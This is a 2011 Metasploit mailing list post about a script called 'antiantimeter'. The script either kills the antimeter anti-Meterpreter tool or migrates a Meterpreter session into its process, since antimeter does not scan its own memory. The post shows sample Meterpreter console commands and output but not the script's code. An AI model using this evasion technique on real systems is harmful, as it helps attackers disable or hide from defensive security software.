Metasploit mailing list archives

Fun with antimeter

From: Nikhil Mittal <nikhil_uitrgpv () yahoo co in>
Date: Sat, 16 Apr 2011 21:13:41 +0530 (IST)

Hi List,

Today I was playing with antimeter (A program from hack4career.com to detect and kill meterpreter in memory). It indeed
detects and kills meterpreter. One thing I noticed is that antimeter do not checks its own memory for meterpreter.

So I wrote this very small script which can be used to either kill antimeter or to migrate into it to avoid detection.
I name it antiantimeter. hehe

meterpreter > run antiantimeter -k
[*] Searching for antimeter...
[*] Found antimeter process 5116...Killing
meterpreter > run antiantimeter -m
[*] Searching for antimeter...
[*] Found antimeter process 2488...Migrating in it
[*] Migrated into antimeter.exe -  2488

P.S. I have borrowed code from some existing scripts. Its just a script for fun do not expect anything useful ;)

Nikhil Mittal
@nikhil_mitt